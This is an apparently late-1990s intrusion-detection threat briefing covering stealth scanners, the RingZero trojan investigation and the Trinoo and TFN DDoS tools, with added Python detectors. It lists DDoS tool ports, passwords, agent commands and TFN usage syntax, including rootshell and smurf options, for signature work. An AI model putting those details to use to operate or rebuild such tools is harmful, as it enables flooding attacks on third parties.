Internet Threat Brief Bad things that happen to good organizations!
Tools that may be visiting your organization • Jackal • Queso • Nmap • Hping • Trojans • DDOS
Enter the Jackal 1997

Opening comments from Jackal.c:

/* Jackal - Stealth/FireWall scanner. With the use of half open ports and sending SYNC (sometimes additional flags like FIN) one can scan behind a firewall. It shouldn't let the site feel we're scanning by not doing a 3-way-handshake; we hope to avoid any tcp-logging.
Credits: Halflife, Jeff (Phiji) Fay, Abdullah Marafie. Alpha Tester: Walter Kopecky.
Results: Some firewalls did allow SYN | FIN to pass through. No Site has been able to log the connections though.. during alpha testing.
ShadowS shadows@kuwait.net
Copyleft (hack it; i really don't care). */
Sons of Jackal continue to be seen

Source port 0 and 65535:
12:36:54 prober.0 > relay.net.2049: SF 111:111(0) win 512
16:11:38 IMAPER.65535 > ns2.org.143: SF 111:111(0) win 512
13:10:33 newbe.org.0 > 192.168.2.3.13: SF 111:111(0) win 512

SF: SYN (Synchronize, start) and FIN (Finish, stop) set in the same segment. No legitimate TCP stack sends that combination, and source ports 0 and 65535 are never chosen by a normal client, so either one on its own is worth an alert.
Queso and friends http://www.apostols.org/projectz/queso/ Queso sends packets with unexpected TCP flag (code bit) combinations and uses the way the remote stack answers them to determine its operating system. Currently the authors claim to be able to distinguish over 100 OSes and OS states. The Queso pattern is shown on the notes page.
Hping (Jan 98) Designed to port scan hosts indirectly: the probe packets are "bounced off" a third host, the one the attacker is framing, so the target never sees the attacker's own address. Hping is interesting because it can both spoof its source and still collect information on the target; that had not been accomplished before.
Nmap The next generation of the tools that came before it integrates all their capabilities in a single tool: • Stealth scanning • Stack analysis, TCP fingerprinting • Sequence number prediction • Decoy
Trojans This is Roland’s home computer, connected to an ISP
Trojans “Driving the Bus”, NETBUS
W97M.Marker.a • Word 97 Virus • HKEY_CURRENT_USER\Software\Microsoft\MS Setup(ACME)\User Info • What does it do? • FTP’s what appear to be “worm tracks”, a list of the previous systems it has infected • Could potentially be a valuable recon tool for developing chains of potential infection
PCs ship with fast modems as standard equipment (diagram: INTERNET - ISP - Firewall) The more restrictive a site's firewall policy, the more likely the employees will use modems.
Trojans Review • The most well known trojan programs are Netbus and Back Orifice • Protective tools include: all major anti-virus tools, Nuke Nabber, NFR's Back Officer Friendly, and AtGuard
The Next “Threat Wave” • The security community is doing a better job of securing networks. • Firewalls, IDSs, Encryption • Doesn’t it make sense that future threats will bypass these countermeasures from the inside?
An Example: Deep Throat Trace

200.31.13.8 > 158.12.110.1.2140: udp 2
4500 001e e104 0000 7111 8795 ac14 0d08 c0a8 6e01
ea60 085c 000a fbb7 3030 8080 0001 0001 0000 0000
0664 6f6e 616c

200.31.13.8 > 158.12.110.2.2140: udp 2
4500 001e e204 0000 7111 8694 ac14 0d08 c0a8 6e02
ea60 085c 000a fbb6 3030 0000 0001 0000 0000 0000
0331 3831 0231
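The two hex dumps above decoded by hand are easy to misread, so here is an added example (not code from the briefing) that does it with the standard library. It takes the dumps exactly as printed (reading the slide's "coa8" as a transcription of "c0a8", which is an assumption) and the addresses from the slide's own summary lines. Decoding shows what the summary line only hints at: UDP from source port 60000 to port 2140 carrying the two-byte payload "00". It also shows that the hex was sanitized separately from the summary line (the hex carries 172.20.13.8 -> 192.168.110.x, the summary 200.31.13.8 -> 158.12.110.x), which is why the IP and UDP checksums only verify once the summary-line addresses are substituted back. That is the check to run before trusting any sanitized trace you receive.

```python
"""Decode the Deep Throat trace from its tcpdump -x hex dump.

Added example, not code from the briefing. Inputs are the two dumps on the
slide (with 'coa8' read as 'c0a8', an assumption) and the addresses printed on
the slide's summary lines.
"""
import struct

# IP total length is 0x001e = 30 bytes; the decoder drops anything after that
# (the remaining words in the slide's dump are capture padding).
DEEP_THROAT_HEX = [
    "4500 001e e104 0000 7111 8795 ac14 0d08 c0a8 6e01 ea60 085c 000a fbb7 3030",
    "4500 001e e204 0000 7111 8694 ac14 0d08 c0a8 6e02 ea60 085c 000a fbb6 3030",
]
# Addresses from the summary lines "200.31.13.8 > 158.12.110.N.2140: udp 2".
SUMMARY_ADDRESSES = [("200.31.13.8", "158.12.110.1"), ("200.31.13.8", "158.12.110.2")]


def hex_to_bytes(dump):
    return bytes.fromhex(dump.replace(" ", ""))


def ones_complement_sum(data):
    """RFC 1071 checksum; returns 0 when `data` already holds a valid checksum."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ip_str(b):
    return ".".join(str(x) for x in b)


def ip_bytes(s):
    return bytes(int(o) for o in s.split("."))


def decode_udp_packet(pkt):
    """IPv4 + UDP header fields, the payload, and whether both checksums verify."""
    ihl = (pkt[0] & 0x0F) * 4
    total_len, ip_id, _frag, ttl, proto, _csum = struct.unpack("!HHHBBH", pkt[2:12])
    if proto != 17:
        raise ValueError("not UDP: protocol %d" % proto)
    pkt = pkt[:total_len]                       # drop capture padding
    src, dst = pkt[12:16], pkt[16:20]
    sport, dport, udp_len, _ucsum = struct.unpack("!HHHH", pkt[ihl:ihl + 8])
    udp = pkt[ihl:ihl + udp_len]
    pseudo = src + dst + b"\x00\x11" + struct.pack("!H", udp_len)   # UDP pseudo-header
    return {
        "ip_id": ip_id, "ttl": ttl, "src": ip_str(src), "dst": ip_str(dst),
        "sport": sport, "dport": dport, "payload": udp[8:],
        "ip_checksum_ok": ones_complement_sum(pkt[:ihl]) == 0,
        "udp_checksum_ok": ones_complement_sum(pseudo + udp) == 0,
    }


def with_addresses(pkt, src, dst):
    """Copy of `pkt` with the IP addresses swapped in; checksums are left untouched."""
    return pkt[:12] + ip_bytes(src) + ip_bytes(dst) + pkt[20:]


def analyze():
    """Decode each dump as printed, then again with the summary-line addresses."""
    results = []
    for dump, (src, dst) in zip(DEEP_THROAT_HEX, SUMMARY_ADDRESSES):
        raw = hex_to_bytes(dump)
        results.append((decode_udp_packet(raw), decode_udp_packet(with_addresses(raw, src, dst))))
    return results


if __name__ == "__main__":
    for as_printed, with_summary in analyze():
        print(as_printed)
        print("checksums with summary-line addresses: ip=%s udp=%s"
              % (with_summary["ip_checksum_ok"], with_summary["udp_checksum_ok"]))
```

The TTL of 0x71 (113) in the IP header is also worth noting: it sits 15 below 128, which is consistent with a Windows host 15 hops away and is the same kind of clue the RingZero analysis later uses to argue the sources were not spoofed.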
The Story of RingZero • Indications and Warnings • This is BIG! • What is it? • What are “they” up to? • Decoding RingZero
Getting A Clue • Sept 19, 1999 Roland Grefer writes with an AtGuard detect from his home.com cablemodem • We both commented that probes to tcp port 3128 are not that common
Indications and Warnings • Sept 21, 1999 - NSWC SHADOW analyst Adena Bushrod reports activity • Army ARL, Mitre, and others are seeing "Proxy Scans" too! Example:
08:58:35 ghostrid3r.1606 > 192.168.2.1.80: S(0)
08:58:36 ghostrid3r.1607 > 192.168.2.1.8080: S(0)
08:58:37 ghostrid3r.1609 > 192.168.2.1.3128: S(0)
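Both the Jackal SYN/FIN traces shown earlier and the proxy-scan triplet above are plain tcpdump one-liners, so one small parser serves both. The following is an added example, not code from the briefing or from SHADOW: it parses the lines, flags Jackal-style probes (SYN and FIN together, or source port 0 / 65535), and reports any source that SYN-probes 80, 8080 and 3128 on the same destination inside a short window. The sample lines are the ones from the slides plus one constructed benign connection; the ten-second window is an assumption.

```python
"""Two detections over tcpdump one-liners of the kind shown in this briefing.

Added example, not code from the briefing or from any tool it names. Sample
lines are the slides' own (sanitized) traces plus one constructed benign SYN;
the time window is an assumption.
"""
import re
from collections import defaultdict

# Matches "src.port > dst.port: SF 111:111(0) win 512" and "src.port > dst.port: S(0)".
LINE_RE = re.compile(
    r"^(?P<time>\d{2}:\d{2}:\d{2})\s+"
    r"(?P<src>\S+)\.(?P<sport>\d+)\s+>\s+"
    r"(?P<dst>\S+)\.(?P<dport>\d+):\s+"
    r"(?P<flags>[SFRPAU.]+)"
)

SAMPLE_LINES = """\
12:36:54 prober.0 > relay.net.2049: SF 111:111(0) win 512
16:11:38 IMAPER.65535 > ns2.org.143: SF 111:111(0) win 512
13:10:33 newbe.org.0 > 192.168.2.3.13: SF 111:111(0) win 512
08:58:35 ghostrid3r.1606 > 192.168.2.1.80: S(0)
08:58:36 ghostrid3r.1607 > 192.168.2.1.8080: S(0)
08:58:37 ghostrid3r.1609 > 192.168.2.1.3128: S(0)
09:15:02 192.168.2.9.1025 > 192.168.2.1.80: S(0)
"""


def parse_line(line):
    """Dict for one tcpdump TCP summary line, or None if the line does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    p = m.groupdict()
    p["sport"], p["dport"] = int(p["sport"]), int(p["dport"])
    h, mi, s = (int(x) for x in p["time"].split(":"))
    p["t"] = h * 3600 + mi * 60 + s          # seconds since midnight, for windowing
    return p


def parse_lines(text):
    return [p for p in (parse_line(l) for l in text.splitlines()) if p]


def jackal_reasons(p):
    """Why a packet looks like a Jackal-style stealth probe (empty list = clean)."""
    reasons = []
    if "S" in p["flags"] and "F" in p["flags"]:
        reasons.append("SYN+FIN set together")
    if p["sport"] in (0, 65535):
        reasons.append("reserved source port %d" % p["sport"])
    return reasons


def find_jackal_probes(pkts):
    return [(p["time"], p["src"], p["dst"], jackal_reasons(p)) for p in pkts if jackal_reasons(p)]


PROXY_PORTS = frozenset({80, 8080, 3128})


def find_proxy_scanners(pkts, window=10):
    """(src, dst) pairs where one source SYN-probes all of 80, 8080 and 3128 within `window` seconds."""
    syns = defaultdict(list)
    for p in pkts:
        if p["dport"] in PROXY_PORTS and "S" in p["flags"] and "A" not in p["flags"]:
            syns[(p["src"], p["dst"])].append((p["t"], p["dport"]))
    hits = []
    for key, events in syns.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            ports = {port for t, port in events[i:] if t - t0 <= window}
            if ports >= PROXY_PORTS:
                hits.append(key)
                break
    return hits


if __name__ == "__main__":
    pkts = parse_lines(SAMPLE_LINES)
    for hit in find_jackal_probes(pkts):
        print("jackal-style probe:", hit)
    for src, dst in find_proxy_scanners(pkts):
        print("proxy scan triplet: %s -> %s" % (src, dst))
```

The triplet rule keys on source and destination together, which is what makes RingZero stand out from an ordinary port sweep: each infected host walks random destinations, so the three ports arrive from one source to one target within a second or two rather than one port across many targets.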
SANS Community Validation “ Intrusion detection systems ranging from home computers with cable modems to high end government facilities have been reporting a large number of probes to TCP port 3128, the squid proxy service. If your site has a network monitoring capability and you DO NOT run squid and you detect this pattern over the next two weeks, please let us know by sending email to info@sans.org with intrusion 3128 in the subject line. If you are allowed to send the data trace, please sanitize any of your site's network information (destination host address) and send the data trace as well. Thank you!” This is BIG!
Over 300 3128 Messages In Three Days
29;23Sep1999; 7:59:21;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;203.98.30.10;xxx.yyy.149.44;3128;64052;48;25;
30;23Sep1999; 7:59:24;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;203.98.30.10;xxx.yyy.149.44;3128;64053;48;25;
31;23Sep1999; 8:07:30;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;196.15.173.2;xxx.yyy.214.101;3128;64025;44;48;
32;23Sep1999; 8:24:05;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;209.203.121.119;xxx.yyy.124.154;3128;3820;48;25;
33;23Sep1999; 8:24:11;xxx.yyy.111.133;log;reject;;E100B1;inbound;tcp;194.51.132.171;xxx.yyy.170.248;3128;1195;44;25;
34;23Sep1999; 8:59:23;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;156.46.64.149;xxx.yyy.135.194;3128;2570;44;48;
35;23Sep1999; 9:00:49;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;194.51.132.171;xxx.yyy.214.228;3128;2932;44;48;
36;23Sep1999; 9:14:51;xxx.yyy.111.133;log;reject;;E100B1;inbound;tcp;195.44.9.20;xxx.yyy.95.90;3128;1089;44;25;
37;23Sep1999; 9:33:38;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;212.130.192.222;xxx.yyy.139.66;3128;2678;48;48;
38;23Sep1999; 9:40:13;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;193.125.239.105;xxx.yyy.1.31;3128;1531;48;48;
39;23Sep1999; 9:56:08;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;194.249.154.21;xxx.yyy.27.35;3128;2515;44;48;
40;23Sep1999; 9:57:40;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;200.14.243.166;xxx.yyy.123.25;3128;4879;48;25;
Over 1000 Source Hosts!
What Could It Be? • Given: • More than 1000 live sources • Apparently random destinations • What Could It Be? • Spoofed • World's largest coordinated attack • Trojan software or "malware"
Spoofed Attack? No! “I am almost certain that these are indeed live, non-spoofed hosts. First, I've dumped the tcpdump traffic with the arriving TTL values. I've done about a dozen traceroutes back to the source IP's and the hop counts are believably close. Also, other clues found in the tcpdump output itself appear to point to different hosts or a very wise crafter. “ Judy Novak - ARL
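The TTL argument in the note above can be turned into a routine check. The following is an added example, not part of the briefing or of ARL's analysis: from the arriving TTL it infers the nearest common initial TTL and hence the hop count, compares that with a traceroute back to the claimed source, and also flags sources whose arriving TTL is not stable, which is what a crafter randomising TTLs looks like. The initial-TTL table (32, 64, 128, 255) and the observed TTLs and traceroute hop counts are constructed assumptions; the two source addresses are taken from the firewall log above.

```python
"""Spoof plausibility check from arriving TTLs, the method described in the note above.

Added example, not part of the briefing. Assumptions: common initial TTLs are
32, 64, 128 and 255; the arriving TTLs and traceroute hop counts are constructed.
"""

INITIAL_TTLS = (32, 64, 128, 255)


def infer_initial_ttl(arriving_ttl):
    """Smallest common initial TTL not below the arriving value, and the implied hop count."""
    for initial in INITIAL_TTLS:
        if arriving_ttl <= initial:
            return initial, initial - arriving_ttl
    raise ValueError("invalid TTL %r" % arriving_ttl)


def judge_source(arriving_ttls, traceroute_hops, slack=3):
    """Return (verdict, detail) for one source.

    'spoofed?' when the arriving TTL is unstable (a crafter varying TTLs), or when the
    implied hop count differs from a traceroute back to the claimed source by more than
    `slack`; otherwise 'plausible'. Routes are rarely exactly symmetric, hence the slack.
    """
    ttls = set(arriving_ttls)
    if len(ttls) > 1:
        return "spoofed?", "unstable arriving TTL %s" % sorted(ttls)
    ttl = ttls.pop()
    initial, hops = infer_initial_ttl(ttl)
    detail = "ttl %d implies %d hops from initial %d" % (ttl, hops, initial)
    if traceroute_hops is not None and abs(hops - traceroute_hops) > slack:
        return "spoofed?", detail + ", traceroute says %d" % traceroute_hops
    return "plausible", detail


# Constructed observations: source -> arriving TTLs seen at the sensor.
OBSERVATIONS = {
    "203.98.30.10": [113, 113, 113],
    "194.51.132.171": [50, 50],
    "10.9.8.7": [17, 201, 88],
}
# Constructed hop counts from traceroutes back to each source.
TRACEROUTE_HOPS = {"203.98.30.10": 16, "194.51.132.171": 4, "10.9.8.7": 12}


def judge_all(observations=OBSERVATIONS, traceroutes=TRACEROUTE_HOPS):
    return {src: judge_source(ttls, traceroutes.get(src)) for src, ttls in observations.items()}


if __name__ == "__main__":
    for src, (verdict, detail) in judge_all().items():
        print("%-16s %-9s %s" % (src, verdict, detail))
```

The inference is deliberately loose: an arriving TTL of 50 is read as 14 hops from an initial 64, although 78 hops from 128 is arithmetically possible. The check is a plausibility filter, not proof; it was enough here because a thousand independent sources all passed it.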
The First Hot Tip - Sept 23
"We began receiving probes to 3128 on Wednesday, September 15th. The probes come in a triplet - first to TCP port 80, then 8080, then 3128. The probes appear to be going after random addresses. One finally hit a web server listening on port 80 so I got to see what it was doing. It sent the following request to the server:"
get http://www.rusftpsearch.net/cgi-bin/pst.pl/? pst mode = writeip&pst host=192.168.2.1&pstport=80
Anonymous
So What? “Just a couple additional pieces of information. I only probed back in a rather simple way about 5 machines and found none of those running finger, SMTP or FTP, though all were running TCP port 139, so I concluded (with a very small sample size) it was a Windows attack of some kind, though I admit this is a guess based on sketchy information.” Anonymous
Game Over? “I am the Network Security Officer at Vanderbilt University. I have a system that was infected with a trojan called RingZero and was scanning for ports 80, 8080, and 3128. I have pieces of the code specifically a file called its.exe and a file that was Ring0.vxd. I am still trying to find the original infected file and I suspect that it was a screen saver. If you would like more info give me a call.” Ron Marcum, Vanderbilt
Birds Of A Feather • Extreme BoF! • Crowded room • High temperatures • Long hours 7 hours of fun! (7PM-2AM)
Russian Server? Or Not? • The rusftpsearch.net site • contained Russian language text • is a German based company • is hosted by virtualave.net in Seattle, WA • is administered by “Black Harmer” • Black Harmer uses mail.ru for free email • Some of Harmer’s code published on fido7.pvt.virii • The data seems to indicate a “Russian interest”
Latest News • SMTP to Finland • Upon the successful download of two its.dat files, its.exe attempts to connect to tcp port 25 (smtp) of rokol.ramk.fi • Spamming ICQ Users • Spoofs source as www.mircosoft.com • Spams XXXXX@pager.mirabilis.com
Review of Findings • ITS.EXE attempts to • retrieve its.dat from various servers • connect to tcp port 25 of rokol.ramk.fi • Spam random ICQ users with the message “Biggest Proxy List!” and the rusftpsearch URL • PST.EXE is the active scanner • doesn’t require the its.dat file to run • discovered proxies send their IPs to www.rusftpsearch.net
Questions Still Remain • Infection mechanism? • Thought to be an email attachment • What is the its.dat file for? • Targeting • Scan intensity dial • Attack configuration
Implications? “Quantum leap in distributed attack technology” • Viral infection rates • Configurable - its.dat • scanning -> attacking? • Automatic result consolidation • Hacker community notification
Threat Advisory Distributed IW Tools By John Green
Force Multiplication (diagram): Hacker -> Handlers H1..HN -> Agents A1..AN -> Target T. The agents are themselves victims; the target is the final one.
Trinoo Network • Distributed UDP Flood DoS Attack Tool • Client / Server Architecture • A trinoo network of 227 systems was used against an Internet2 site, causing a DoS which lasted for two days.
Trinoo Signatures • Hacker -> Handler (H1): TCP port 27665, password "betaalmostdone" • Agent (A1..AN) -> Handler: UDP port 31335, "*HELLO*" • Handler -> Agent: UDP port 27444, password "l44adsl" • Agent -> Target (T): UDP flood to random ports
Trinoo Supported Commands
Handler: die, quit, mtimer, dos, mdie, mping, mdos, info, msize, nslookup, killdead, usebackup, bcast, help, mstop
Agent: • aaa - start UDP DoS • bbb - DoS time limit • shi - phone home • png - report in • d1e - shut down • rsz N - resize packet • xyz - multiple DoS
Tribal Flood Network • Distributed ICMP/TCP/UDP Flood DoS • Client / Server Architecture • Similar to Trinoo, but much more stealthy • uses covert channels for handler-agent communications
TFN Signatures • Hacker -> Handler (H1): any backdoor access method • Handler <-> Agent (A1..AN): ICMP Echo Reply in both directions; commands are sent as 16-bit integers in the ID field of the ICMP echo header, so there is no listening port to find • Agent -> Target (T): TCP/UDP/ICMP flood
TFN Supported Commands • Usage: ./tfn <iplist> <type> [ip] [port] • <iplist> - list of agent hosts • <type> - -1 spoofmask, -2 packetsize, 0 stop/status, 1 udp, 2 syn, 3 icmp, 4 bind to a rootshell, 5 smurf • [ip] - target list separated by @ • [port] - necessary for syn flood, 0 = random
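Because TFN talks to its agents in ICMP echo replies, the usual port-based signatures do not apply; what does stand out is an echo reply that answers no echo request the sensor saw. The following is an added example, not code from the briefing or from TFN: it parses the 8-byte ICMP echo header, keeps a set of outstanding requests, flags replies with no matching request, and pulls out the 16-bit ID field as the candidate command. The capture records are constructed; what a particular ID value means to TFN is not stated on this page and is not assumed here.

```python
"""Flag ICMP echo replies that answer no observed echo request (TFN handler/agent traffic).

Added example, not from the briefing or from TFN itself. The capture below is
constructed, checksums in it are left zero, and no meaning is attached to any
ID value: the detector only reports what it sees.
"""
import struct

ECHO_REPLY, ECHO_REQUEST = 0, 8


def parse_icmp_header(data):
    """type, code, checksum, id, seq and payload from an ICMP echo packet."""
    icmp_type, code, csum, ident, seq = struct.unpack("!BBHHH", data[:8])
    return {"type": icmp_type, "code": code, "checksum": csum,
            "id": ident, "seq": seq, "payload": data[8:]}


def echo(icmp_type, ident, seq, payload=b""):
    """Build a constructed ICMP echo request/reply; checksum deliberately left at zero."""
    return struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq) + payload


# Constructed capture: (src, dst, raw ICMP bytes) in arrival order.
CAPTURE = [
    ("192.168.2.9", "192.168.2.1", echo(ECHO_REQUEST, 0x1234, 1)),
    ("192.168.2.1", "192.168.2.9", echo(ECHO_REPLY, 0x1234, 1)),   # answers the request above
    ("10.0.0.5", "192.168.2.20", echo(ECHO_REPLY, 456, 0)),         # nobody on our net asked
    ("192.168.2.9", "192.168.2.1", echo(ECHO_REQUEST, 0x1234, 2)),
    ("192.168.2.1", "192.168.2.9", echo(ECHO_REPLY, 0x1234, 3)),   # seq we never sent
]


def find_unsolicited_echo_replies(capture):
    """Echo replies with no matching (dst, src, id, seq) request seen earlier in the capture."""
    outstanding = set()
    flagged = []
    for src, dst, raw in capture:
        h = parse_icmp_header(raw)
        if h["type"] == ECHO_REQUEST:
            outstanding.add((src, dst, h["id"], h["seq"]))
        elif h["type"] == ECHO_REPLY:
            match = (dst, src, h["id"], h["seq"])      # reply reverses the request's direction
            if match in outstanding:
                outstanding.discard(match)
            else:
                flagged.append({"src": src, "dst": dst, "icmp_id": h["id"],
                                "seq": h["seq"], "payload": h["payload"]})
    return flagged


if __name__ == "__main__":
    for r in find_unsolicited_echo_replies(CAPTURE):
        print("unsolicited echo reply %s -> %s, id=%d seq=%d" % (r["src"], r["dst"], r["icmp_id"], r["seq"]))
```

On a real sensor the outstanding set needs ageing and a size bound, and replies to requests that left by a path the sensor does not see (asymmetric routing) will show up as false positives; the ID and sequence values of those will look like ordinary ping traffic, which is how you tell them apart.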
So what does it mean? • 1997 • Stealth, resist logging • Penetration, evade SYN matching • 1998 • TCP Fingerprinting - stack analysis • Coordinated attacks
So what does it mean? • 1999 • Database analysis capability • Continued work on distributed scanners • Decoys, decoys, decoys • Advanced scans for trojans
Houston, we have a problem • Technological surprise • Decoys are going to really screw with low end intrusion detection systems and untrained analysts • CIRTs are going to need raw data from detects
What am I doing • High end proxy firewalls • Checking log files, intrusion detection • Personal firewalls (TCP Wrappers, Nuke Nabber, NFR Back Officer Friendly, AtGuard) • Encrypting more of my files, moving to 2048-bit keys